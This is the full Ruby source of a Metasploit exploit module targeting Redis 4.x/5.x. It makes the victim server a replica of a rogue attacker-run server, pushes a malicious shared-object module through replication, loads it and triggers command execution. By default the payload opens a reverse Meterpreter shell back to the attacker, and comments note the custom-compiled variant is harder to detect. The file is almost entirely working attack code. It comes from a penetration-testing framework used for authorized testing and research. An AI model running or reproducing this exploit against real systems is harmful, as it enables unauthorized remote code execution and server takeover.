1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::TcpServer
10
  include Msf::Exploit::CmdStager
11
  include Msf::Exploit::FileDropper
12
  include Msf::Auxiliary::Redis
13
  include Msf::Module::Deprecated
14

15
  moved_from 'exploit/linux/redis/redis_unauth_exec'
16

17
  def initialize(info = {})
18
    super(
19
      update_info(
20
        info,
21
        'Name' => 'Redis Replication Code Execution',
22
        'Description' => %q{
23
          This module can be used to leverage the extension functionality added since Redis 4.0.0
24
          to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
25
          which called replication between master and slave.
26
        },
27
        'License' => MSF_LICENSE,
28
        'Author' => [
29
          'Green-m  <greenm.xxoo[at]gmail.com>' # Metasploit module
30
        ],
31
        'References' => [
32
          [ 'CVE', '2018-11218' ],
33
          [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'],
34
          [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK']
35
        ],
36

37
        'Platform' => 'linux',
38
        'Arch' => [ARCH_X86, ARCH_X64],
39
        'Targets' => [
40
          ['Automatic', {} ],
41
        ],
42
        'DefaultOptions' => {
43
          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
44
          'SRVPORT' => '6379'
45
        },
46
        'Privileged' => false,
47
        'DisclosureDate' => '2018-11-13',
48
        'DefaultTarget' => 0,
49
        'Notes' => {
50
          'Stability' => [ SERVICE_RESOURCE_LOSS ],
51
          'Reliability' => [ REPEATABLE_SESSION ],
52
          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
53
        }
54
      )
55
    )
56

57
    register_options(
58
      [
59
        Opt::RPORT(6379),
60
        OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
61
      ]
62
    )
63

64
    register_advanced_options(
65
      [
66
        OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
67
        OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']),
68
        OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.'])
69
      ]
70
    )
71
    deregister_options('URIPATH', 'THREADS', 'SSLCert')
72
  end
73

74
  #
75
  # Now tested on redis 4.x and 5.x
76
  #
77
  def check
78
    connect
79
    # they are only vulnerable if we can run the CONFIG command, so try that
80
    return CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
81

82
    if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
83
      report_redis(redis_version)
84
    end
85

86
    unless redis_version
87
      return CheckCode::Unknown('Cannot retrieve redis version, please check it manually')
88
    end
89

90
    # Only vulnerable to version 4.x or 5.x
91
    version = Rex::Version.new(redis_version)
92
    if version >= Rex::Version.new('4.0.0')
93
      return CheckCode::Vulnerable("Redis version is #{redis_version}")
94
    end
95

96
    CheckCode::Safe
97
  ensure
98
    disconnect
99
  end
100

101
  def has_check?
102
    true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis
103
  end
104

105
  def exploit
106
    if check_custom
107
      @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8)
108
      @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
109
    else
110
      @module_init_name = 'shell'
111
      @module_cmd = 'shell.exec'
112
    end
113

114
    if srvhost == '0.0.0.0'
115
      fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
116
    end
117

118
    #
119
    # Prepare for payload.
120
    #
121
    #  1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable.
122
    #     It's only worked on linux system.
123
    #
124
    #  2. Use compiled payload, it's avaiable on all OS, however more detectable.
125
    #
126
    if check_custom
127
      buf = create_payload
128
      generate_code_file(buf)
129
      compile_payload
130
    end
131

132
    connect
133

134
    #
135
    # Send the payload.
136
    #
137
    redis_command('SLAVEOF', srvhost, srvport.to_s)
138
    redis_command('CONFIG', 'SET', 'dbfilename', module_file.to_s)
139
    ::IO.select(nil, nil, nil, 2.0)
140

141
    # start the rogue server
142
    start_rogue_server
143
    # waiting for victim to receive the payload.
144
    Rex.sleep(1)
145
    redis_command('MODULE', 'LOAD', "./#{module_file}")
146
    redis_command('SLAVEOF', 'NO', 'ONE')
147

148
    # Trigger it.
149
    print_status('Sending command to trigger payload.')
150
    pull_the_trigger
151

152
    # Clean up
153
    Rex.sleep(2)
154
    register_file_for_cleanup("./#{module_file}")
155
    # redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
156
    # redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
157
  ensure
158
    disconnect
159
  end
160

161
  #
162
  # We pretend to be a real redis server, and then slave the victim.
163
  #
164
  def start_rogue_server
165
    begin
166
      socket = Rex::Socket::TcpServer.create({ 'LocalHost' => srvhost, 'LocalPort' => srvport })
167
      print_status("Listening on #{srvhost}:#{srvport}")
168
    rescue Rex::BindFailed
169
      print_warning("Handler failed to bind to #{srvhost}:#{srvport}")
170
      print_status("Listening on 0.0.0.0:#{srvport}")
171
      socket = Rex::Socket::TcpServer.create({ 'LocalHost' => '0.0.0.0', 'LocalPort' => srvport })
172
    end
173

174
    rsock = socket.accept
175
    vprint_status('Accepted a connection')
176

177
    # Start negotiation
178
    loop do
179
      request = rsock.read(1024)
180
      vprint_status("in<<< #{request.inspect}")
181
      response = ''
182
      finish = false
183

184
      if request.include?('PING')
185
        response = "+PONG\r\n"
186
      elsif request.include?('REPLCONF')
187
        response = "+OK\r\n"
188
      elsif request.include?('PSYNC') || request.include?('SYNC')
189
        response = "+FULLRESYNC #{'Z' * 40} 1\r\n"
190
        response << "$#{payload_bin.length}\r\n"
191
        response << "#{payload_bin}\r\n"
192
        finish = true
193
      end
194

195
      if response.length < 200
196
        vprint_status("out>>> #{response.inspect}")
197
      else
198
        vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..]}")
199
      end
200

201
      rsock.put(response)
202

203
      next unless finish
204

205
      print_status('Rogue server close...')
206
      rsock.close
207
      socket.close
208
      break
209
    end
210
  end
211

212
  def pull_the_trigger
213
    if check_custom
214
      redis_command(@module_cmd.to_s)
215
    else
216
      execute_cmdstager
217
    end
218
  end
219

220
  #
221
  # Parpare command stager for the pre-compiled payload.
222
  # And the command of module is hard-coded.
223
  #
224
  def execute_command(cmd, _opts = {})
225
    redis_command('shell.exec', cmd.to_s)
226
  rescue StandardError
227
    nil
228
  end
229

230
  #
231
  # Generate source code file of payload to be compiled dynamicly.
232
  #
233
  def generate_code_file(buf)
234
    template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
235
    File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding)) }
236
  end
237

238
  def compile_payload
239
    make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile')
240
    vprint_status('Clean old files')
241
    vprint_status(`make -C #{File.dirname(make_file)}/rmutil clean`)
242
    vprint_status(`make -C #{File.dirname(make_file)} clean`)
243

244
    print_status('Compile redis module extension file')
245
    res = `make -C #{File.dirname(make_file)} -f #{make_file} && echo true`
246
    if res.include?('true')
247
      print_good('Payload generated successfully! ')
248
    else
249
      print_error(res)
250
      fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
251
    end
252
  end
253

254
  #
255
  # check the environment for compile payload to so file.
256
  #
257
  def check_env
258
    # check if linux
259
    return false unless `uname -s 2>/dev/null`.include?('Linux')
260
    # check if gcc installed
261
    return false unless `command -v gcc && echo true`.include?('true')
262
    # check if ld installed
263
    return false unless `command -v ld && echo true`.include?('true')
264

265
    true
266
  end
267

268
  def check_custom
269
    return @custom_payload if @custom_payload
270

271
    @custom_payload = false
272
    @custom_payload = true if check_env && datastore['CUSTOM']
273

274
    @custom_payload
275
  end
276

277
  def module_file
278
    return @module_file if @module_file
279

280
    @module_file = datastore['RedisModuleName'] || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
281
  end
282

283
  def create_payload
284
    p = payload.encoded
285
    Msf::Simple::Buffer.transform(p, 'c', 'buf')
286
  end
287

288
  def payload_bin
289
    return @payload_bin if @payload_bin
290

291
    if check_custom
292
      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so'))
293
    else
294
      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp', 'exp.so'))
295
    end
296
    @payload_bin
297
  end
298
end
299

300